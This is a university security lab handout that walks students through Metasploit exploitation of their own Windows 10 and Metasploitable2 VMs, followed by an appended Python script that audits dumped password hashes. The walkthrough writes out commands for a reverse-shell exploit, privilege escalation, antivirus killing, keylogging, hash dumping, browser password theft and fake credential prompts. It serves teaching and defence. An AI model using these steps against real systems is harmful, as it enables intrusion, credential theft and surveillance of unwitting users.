Temple MIS



Lab 7: Exploitation

Name:

In this lab you will use Metasploit and the Nessus vulnerability reports you created to exploit and take control of the Windows 10 and Metasploitable VMs you scanned in the previous lab.

Metasploit is the industry's most popular exploitation tool. According to one description:

"Metasploit took the security world by storm when it was released in 2004. It is an advanced open-source platform for developing, testing, and using exploit code. The extensible model through which payloads, encoders, no-op generators, and exploits can be integrated has made it possible to use the Metasploit Framework as an outlet for cutting-edge exploitation research. It ships with hundreds of exploits, as you can see in their list of modules. This makes writing your own exploits easier, and it certainly beats scouring the darkest corners of the Internet for illicit shellcode of dubious quality. One free extra is Metasploitable, an intentionally insecure Linux virtual machine you can use for testing Metasploit and other exploitation tools without hitting live servers. Metasploit was completely free, but the project was acquired by Rapid7 in 2009 and it soon sprouted commercial variants. The Framework itself is still free and open source, but they now also offer a free-but-limited Community edition, a more advanced Express edition ($5,000 per year per user), and a full-featured Pro edition. Other paid exploitation tools to consider are Core Impact (more expensive) and Canvas (less)."

Metasploit Interfaces

The Metasploit framework has a variety of interfaces, including the command line tool msfcli and meterpreter, an interface designed to interact with compromised computers. You can even work from an interactive Ruby interpreter within Metasploit (Metasploit is written in Ruby). However, the most popular interface, and the one we will use chiefly in this lab, is msfconsole.
Msfconsole is an interactive environment that allows you to scan hosts, test and launch exploits, and build and deploy payloads.

Terminology

Below is a list of common terminology relating to Metasploit, taken (with some adaptation) from Metasploit: The Penetration Tester's Guide, by Kennedy et al.

Exploit: The means by which an attacker takes advantage of a flaw within a system, an application, or a service. An exploit results in a particular outcome unintended by the original developer. Common exploits include buffer overflows, web application vulnerabilities (like SQL injection), and configuration errors.

Payload: Code that the attacker wants the system to execute and that is selected and delivered by Metasploit. For example, a reverse shell is a payload that creates a connection from the target machine back to the attacker as a command prompt, whereas a bind shell is a payload that "binds" a command prompt to a listening port on the target machine, to which the attacker can then connect. A payload could also be something as simple as a few commands to be executed on the target operating system.

Module: A module in the context of Metasploit is a piece of software that can be used by Metasploit. At times, you may require the use of an exploit module, a software component that conducts the attack. Other times, an auxiliary module may be required to perform an action such as scanning or system enumeration. These interchangeable modules are the core of what makes Metasploit so powerful.

Listener: A component within Metasploit that waits for an incoming connection of some kind. For example, after the target machine has been exploited, it may call the attacking machine over the Internet. The listener handles that connection, waiting on the attacking machine to be contacted by the exploited machine.

Common Commands within Msfconsole

help: Lists available commands.

show exploits: Shows all available exploits in the Metasploit framework.
New exploits are constantly being developed and incorporated into the framework.

show auxiliary: Shows auxiliary modules within the Metasploit framework.

search: Searches exploit and auxiliary modules for one or more terms. For those familiar with grep, the search function works the same way.

use [module]: Loads a Metasploit module. The back command exits the module.

back: Exits the current module.

show options: Within a particular module, show options displays the required and optional configurations that the module uses.

show payloads: Within a module, show payloads displays all the payloads that are available to use with the module.

show targets: Within a module, show targets lists the OS versions that are vulnerable to the exploit.

info: Within a module, info shows additional information about the module.

set/unset: Sets an environment variable used as an option specific to a particular module.

setg/unsetg: Sets a global environment variable used as an option that applies across modules.

save: Saves the current global options so they are available the next time you run msfconsole.

Prepare the Windows 10 VM

Use the Windows 10 lab VM for Part 1 of this lab.

Open Windows Defender and turn off real-time protection. To do this, double-click the "disable-defender.ps1" script on the Windows 10 VM desktop. Alternatively, to do this manually: click the Windows button on the bottom left of the desktop, search for "Defender", and choose "Windows Defender Security Center." Click "Virus & Threat protection settings." Move the "Real-time protection" slider to the left.

Turn off Windows Firewall. Open CMD with administrative privileges by typing "cmd" in the Windows search field. Right-click the "Command Prompt" icon and select "Run as administrator." Once the command prompt opens, enter the following command:

netsh advfirewall set allprofiles state off

Configure Kali Linux VM

Boot your Kali VM, and log in as user root with password toor.

Open a terminal and try to ping the IP address of the Windows 10 VM, which is 192.168.55.100.
You can verify this IP address in Windows by typing "ipconfig" at the command prompt.

Finally, from the Windows 10 VM, ensure that you can ping the Kali Linux VM at 192.168.55.101. You can verify this IP address in Linux by typing "ifconfig" (note the "f").

If you are successful in pinging the VM in both directions, then you are ready to continue the lab. If not, make sure that each VM is connected to the infosec-net network by using "ifconfig". Also, make sure that the firewall is down on Windows 10, following the steps above.

Start Icecast on Windows 10

Icecast is a media streaming server that was vulnerable to a buffer overflow attack in versions 2.01 and earlier (see the exploit information here). Old versions of Icecast can be found here. For this section of the lab, you will run a vulnerable version of the Icecast server.

On the Windows 10 desktop, right-click the "Icecast2 Win32" icon. Select "Run as administrator," and click "Yes" on the warning message that pops up.

In the Icecast window, click the button "Start server."

Part 1. Metasploit Exploit Walkthrough Using the Icecast Vulnerability

Boot your Kali VM, and log in as user root with password toor.

Install two packages you'll need for this lab:

apt install mirage
apt install xtightvncviewer

Then type reboot.

After logging back into Kali, from the terminal, enter:

service postgresql start

From the terminal, enter:

msfconsole

You should see a "msf >" prompt appear. This is the Metasploit command line.

Use nmap to scan the Windows 10 VM and check the versions of the available services:

nmap -sV 192.168.55.100

Notice that the Icecast server is listening on port 8000.

From the msf > prompt, try:

search icecast

If the output tells you that you are using "slow search", then cancel with ctrl+c, and run the following from the msf > prompt:

msfdb init
db_connect
db_rebuild_cache

This will allow you to search for Metasploit exploit and auxiliary modules. It may take some time before the search cache is ready.
You can still use "slow search" in the meantime.

In the search output, you should see an exploit related to Icecast called "exploit/windows/http/icecast_header." Use it:

use exploit/windows/http/icecast_header

Note: you can press the tab key within Metasploit to complete a module or command name you are typing. This makes entering commands in Metasploit faster. If you press the tab key twice, it will show you all possible completions in the module or directory you are in.

Your msfconsole prompt should now look like this:

msf exploit(icecast_header) >

To get more information about this module, type info. This module has been rated "great," meaning it is very effective and reliable. Besides providing a better description, the info command shows the targets that the module is effective against, as well as the options to set.

To show available options, type show options.

Let's set the required options. First, we'll set the remote host to the IP address of your Windows 10 VM:

set rhost 192.168.55.100

Type show options again to see that the RHOST variable has been set.

Next, let's look at the available payloads for this exploit:

show payloads

We have a lot of options for this module. We'll use one of the most popular and reliable payloads. Type:

set payload windows/meterpreter/reverse_tcp

This payload will open a reverse TCP connection from the exploited Windows 10 VM back to the Kali VM.

Type show options again to see the options that are required for this payload.

To set the local host variable to the IP address of your Kali VM, type:

set lhost 192.168.55.101

Note: you can easily check your IP in Unix/Linux by typing ifconfig from within Metasploit. Type show options to see that the variable has been set.

With all options set, it's time to launch the exploit. Type exploit.

You should now be presented with the "meterpreter >" prompt. If you see this, then congratulations! You've exploited your first remote host.
Laugh maniacally.

Now that we have access, let's run a few commands to give you an idea of the power of the meterpreter interface.

Type sysinfo to see information about the compromised system.

Type getuid to see the system user you now control.

Escalate your privileges by typing getsystem. Type getuid again. You should see that you have "NT AUTHORITY\SYSTEM," which means you have administrator privileges.

Type:

run post/windows/manage/killav

This stops anti-virus processes that might limit our attacks on the machine.

You can execute commands on the victim's host from within Meterpreter. For example, type:

execute -f cmd.exe -c

This will launch cmd.exe on the victim's machine. You can hide the command window from being shown on the victim machine by using the "-h" option. The "-c" option "channelizes" cmd.exe, which means that meterpreter can continue interacting with it. Notice the message that "Channel 1 was created."

Interact with cmd.exe by typing channel -i 1. Use the dir, cd, and cd .. commands to browse around the file system. Type exit to return to meterpreter.

Since opening a command prompt is such a common action, you can simply type shell to open a hidden command prompt. Type exit to return to meterpreter.

Type screenshot to capture a screenshot of the current GUI. A JPEG file should be saved to /root. You can view the image (outside of meterpreter) by running the mirage viewer:

mirage [image name]

Control the mouse in Windows using VNC. From meterpreter, type background or ctrl + z. This sends the current meterpreter session to the background so you can do more things in the Metasploit console.

Now set the icecast exploit to use a VNC payload:

set payload windows/vncinject/reverse_tcp

Type show options. Change the "ViewOnly" option to false:

set ViewOnly false

Run the exploit again with the new VNC payload by typing exploit.

A new window will open on Kali Linux that will let you control the Windows VM using the mouse.
Try moving a window on the Windows VM, and then close the VNC window on the Kali VM.

Type show options. Get the session number for your meterpreter session by typing sessions -l (that's a lowercase "L"). Note the ID number of your meterpreter session. To interact with your meterpreter session again, type sessions -i [ID], where [ID] is the number of your meterpreter session.

Start a keylogger on the victim's computer. Type keyscan_start. From the Windows 10 machine, open Notepad.exe and type some words. Back in meterpreter, type keyscan_dump. You should see the text you typed in Notepad on the Windows 10 VM. To stop the keylogger, type keyscan_stop.

Download a file. Type ls to see a listing of files in the current directory. Use Notepad to create a text document on the Desktop of the Windows 10 machine. Use the cd command within Meterpreter to browse to the desktop. Type download [filename] to download the text document you just created to the Kali VM. The file should be saved on the Kali VM at /root.

Disable the keyboard and mouse in the Windows VM:

uictl disable all

Try to type or move the mouse in Windows. To re-enable the keyboard and mouse, type:

uictl enable all

Annoy the user. Background the meterpreter session by typing background or ctrl + z. Then type:

use post/multi/manage/play_youtube

Type show options. Get the session number for your meterpreter session by typing sessions -l (that's a lowercase "L"). Note the ID number of your meterpreter session. Type set session [ID], where [ID] is the session number you just identified. Type set vid DLzxrzFCyOs. Type run.

On Windows, you can close the window by typing control + w.
If you were mean, you could pair this trick with disabling the keyboard and mouse on the victim's computer, as in the previous step.

To interact with your meterpreter session again, type sessions -i [ID], where [ID] is the number of your meterpreter session identified above.

Now that you are running off of a system process, you can obtain the password hashes for the machine by typing hashdump. These hashes can be readily cracked using a password cracker like Hashcat (covered in the password cracking lab). For now, we'll use Google to crack the password hash for user labuser.

Note: the hashdump command outputs hashes in the following format:

username:SID:LANMAN hash:NTLM hash:::

For example:

Frank:1000:3A956F63F23DAC7236077A718CCDF409:C1F1B7BDB01896908C80A0A67062BF24:::

Copy the NTLM hash of labuser, open Firefox, and paste it into Google to find out the password.

Question: What is the NTLM hash of WDAGUtilityAccount?

You can migrate meterpreter from the current exploited process to another, more permanent process that is at less risk of being closed down. In this example, you can migrate from the exploited Icecast process to a more permanent process so that you are not at risk of losing your access to the system if Icecast is terminated.

Type ps -S Icecast (note the capital "S" and capital "I") to search for processes with the name "icecast." Note the process ID. Next, type getpid to get the process that meterpreter is running off of. It should be the same process ID as Icecast.

Type ps to see a list of running processes. Type ps -S explorer.exe to find the process ID for "explorer.exe," which is part of the Windows login system. Note that it also has "System" authority. Type migrate [PID for explorer.exe]. Type getpid again to verify that you are now running off of the "explorer.exe" process. Now your connection to the Windows 10 VM will persist until it is rebooted or powered off.

Finally, on your Windows VM, close the Icecast window.
Your meterpreter session should still be running.

Extract the user's passwords saved in Chrome. In Windows, open Chrome and attempt to log in to a website (like tuportal.temple.edu) with your first and last name, and any password (but not something you actually use!). Without actually signing in, click the key symbol to the right of the URL bar, and select "Save."

Background the meterpreter session by typing background or ctrl + z. Then type:

use post/windows/gather/enum_chrome

Get the session number for your meterpreter session by typing sessions -l (that's a lowercase "L"). Note the ID number of your meterpreter session. Type set session [ID], where [ID] is the session number you just identified.

Type show options to make sure you have all of the required options set, then type run to execute the post module. You should see something like the following:

Type:

cat /root/[path to the decrypted Chrome .txt file]

You should now see the Chrome password you saved.

Question: Upload to Canvas a screenshot of the output above containing your name as the user name, like the following:

Prompt the Windows user for their password. Type:

use post/windows/gather/phish_windows_credentials

Type show options. Get the session number for your meterpreter session by typing sessions -l (that's a lowercase "L"). Note the ID number of your meterpreter session. Type set session [ID], where [ID] is the session number you just identified. Type:

set description "explorer.exe needs your password to run."

On Windows, you should see a prompt like the following:

This prompt will not go away until you type in the actual password for labuser, which is Password1. Type in the password.

On Kali, you should now see the password in cleartext.

To see other Meterpreter commands, type help.

When you're finished, type exit to close the Meterpreter session.

Part 2. Metasploitable2 Discovery

For Part 2 of the lab, start the Metasploitable2 VM (see Lab 6 for the download link and setup instructions).

Check which ports are open on the Metasploitable2 VM:

nmap -sV 192.168.55.102

Note that the service "vsftpd" is running on port 21. In the Kali VM, type search vsftpd in Metasploit to find an exploit for vsftpd. Launch the exploit. You should see something like the following:

This means that you have the user account with the user ID of 0 (root), which means you have full administrative privileges.

Notice that there is no "$" symbol at the prompt. However, if you type ls, pwd, id, or other commands, you can see that you have a shell, although one with limited interactivity (colloquially called a "jail shell" because of its limited abilities). To confirm this, type tty. If it says "not a tty," then you have a limited jail shell. If it says "tty /dev/...", then you have a fully interactive shell. You can upgrade your shell in at least two ways, as follows.

Type:

python -c "import pty; pty.spawn('/bin/sh')"

Note: the quotes above are needed for the command.

If you type tty now, it should say something like "/dev/pts/1". This means you now have a full-featured shell.

Convert your shell to a meterpreter, which includes many of the powerful features you learned in the previous section. First, background your session. Type:

use post/multi/manage/shell_to_meterpreter

Type show options. Set the needed options, including the session number for the backgrounded session. Launch the post module.

Connect to the newly created meterpreter session. Type help inside the meterpreter to see what commands are available to you on the Metasploitable2 Linux VM.

Dump the hashes from Metasploitable2. Background the meterpreter session. Type:

use post/linux/gather/hashdump

Set the options and run.
This command combines the user information in /etc/passwd with the password hashes and salts in /etc/shadow so you can use hashcat or John the Ripper to crack the password hashes.

View the hashes by using the cat command against the new file just created in /root/.msf4/loot.

Question: What is the salt and hash for the Postgres user? For example, the salt and hash for msfadmin is:

msfadmin:$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/

Use your Nessus report to identify promising exploits and compromise or get information from Metasploitable 2 using at least two more exploit or auxiliary modules. If you get stuck, feel free to look up a walkthrough for help (many exist). For example, you could use this page.

Deliverables

Question: Attach a screenshot for each of the two successful exploits you performed and upload them to Canvas.

Learn More

To learn more about Metasploit, see the following resources:

News article about one of the most popular and powerful Metasploit modules, Mimikatz:

Metasploit Unleashed. This is an excellent online Metasploit tutorial.

Metasploit: The Penetration Tester's Guide, by Kennedy, O'Gorman, Kearns, and Aharoni. Considered by many to be the best book on Metasploit.

Nice collection of Metasploit video tutorials:

The official Metasploit website:

Account for the Metasploit project:
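As an added example for this lab (it is not part of the handout and not Metasploit code), the script below parses the two hash formats dumped in Part 1 and Part 2 and reports what an administrator reviewing such output would want to fix. The Windows hashdump lines follow the pwdump format the handout describes (username:RID:LM hash:NTLM hash:::; the handout labels the second field SID), and the Linux entries are crypt(3) strings of the form $id$salt$hash as written by post/linux/gather/hashdump. It shows exactly which substring is the salt and which is the hash, which is what the Part 2 question asks for, and flags blank passwords, LM hashes that are still being stored, and MD5-crypt. The sample input consists of the two hashes quoted in the handout plus constructed lines; the empty-password LM and NT constants are the standard published values, and the file name in the usage note is my choice.

```python
"""Audit the two hash formats dumped in this lab.

Added example for the lab write-up; not part of the original handout or of
Metasploit. Windows lines: username:RID:LM hash:NTLM hash:::  (pwdump format).
Linux lines: user:$id$salt$hash[:other /etc/passwd fields]  (crypt(3) format).
"""
from __future__ import annotations
import re
from dataclasses import dataclass, field

# --- Windows (pwdump) -------------------------------------------------------
# Well-known hashes of the empty password: LM and NT respectively.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
PWDUMP_RE = re.compile(r"^([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):::$")

def audit_pwdump(text: str) -> dict[str, list[str]]:
    """Map each user to the findings a defender would act on."""
    report = {}
    for line in filter(None, (l.strip() for l in text.splitlines())):
        m = PWDUMP_RE.match(line)
        if not m:
            raise ValueError(f"not a hashdump line: {line!r}")
        user, rid = m.group(1), int(m.group(2))
        lm, nt = m.group(3).lower(), m.group(4).lower()
        findings = []
        if nt == EMPTY_NT:
            findings.append("blank password")
        if lm != EMPTY_LM:
            findings.append("LM hash stored (legacy, trivially crackable)")
        if rid == 500:
            findings.append("built-in Administrator RID")
        report[user] = findings
    return report

# --- Linux (crypt(3)) -------------------------------------------------------
# crypt(3) scheme identifiers; "1" is the MD5-crypt scheme on Metasploitable2.
SCHEMES = {"1": "MD5-crypt", "5": "SHA-256-crypt", "6": "SHA-512-crypt", "y": "yescrypt"}

@dataclass
class ShadowEntry:
    user: str
    algorithm: str | None = None
    salt: str | None = None
    digest: str | None = None
    findings: list[str] = field(default_factory=list)

def parse_crypt(user: str, pw: str) -> ShadowEntry:
    """Split a shadow password field of the form $id$salt$hash or $id$params$salt$hash."""
    e = ShadowEntry(user)
    if pw == "":
        e.findings.append("empty password field")
    elif pw.startswith(("!", "*")):
        e.findings.append("account locked / no password login")
    elif pw.startswith("$") and pw.count("$") >= 3:
        parts = pw.split("$")            # ['', id, (params...), salt, hash]
        e.algorithm = SCHEMES.get(parts[1], f"unknown scheme ${parts[1]}$")
        e.salt, e.digest = parts[-2], parts[-1]
        if e.algorithm == "MD5-crypt":
            e.findings.append("MD5-crypt is weak by modern standards; migrate to SHA-512-crypt or yescrypt")
    else:
        e.findings.append("legacy or unrecognised hash format")
    return e

def audit_shadow(text: str) -> dict[str, ShadowEntry]:
    """Accept user:hash[:more fields] lines, as in unshadowed /etc/passwd output."""
    report = {}
    for line in filter(None, (l.strip() for l in text.splitlines())):
        fields = line.split(":")
        if len(fields) < 2:
            raise ValueError(f"not a user:hash line: {line!r}")
        report[fields[0]] = parse_crypt(fields[0], fields[1])
    return report

# Sample input: the two hashes quoted in the handout plus constructed lines.
WINDOWS_SAMPLE = "\n".join([
    "Frank:1000:3A956F63F23DAC7236077A718CCDF409:C1F1B7BDB01896908C80A0A67062BF24:::",  # handout
    "Guest:501:" + EMPTY_LM + ":" + EMPTY_NT + ":::",                       # constructed: blank password
    "svc_backup:1002:" + EMPTY_LM + ":" + "0123456789abcdef" * 2 + ":::",   # constructed: clean entry
])
LINUX_SAMPLE = "\n".join([
    "msfadmin:$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/",   # handout
    "sys:*",                                         # constructed: locked account
    "nopass:",                                       # constructed: empty password field
    "alice:$6$constrsalt123456$" + "A" * 86,         # constructed SHA-512-crypt shape
])

if __name__ == "__main__":
    for user, findings in audit_pwdump(WINDOWS_SAMPLE).items():
        print(f"[windows] {user}: {findings or 'ok'}")
    for user, entry in audit_shadow(LINUX_SAMPLE).items():
        print(f"[linux] {user}: {entry.algorithm} salt={entry.salt} hash={entry.digest} {entry.findings or 'ok'}")
```

Run it with python3 audit_hashes.py. The msfadmin line splits into scheme 1 (MD5-crypt), salt XN10Zj2c and hash Rt/zzCW3mLtUWA.ihZjA5/, which is the shape your answer for the Postgres user should take; the Frank line from the handout is flagged because a real LM hash is stored alongside the NTLM hash, which modern Windows builds no longer do by default.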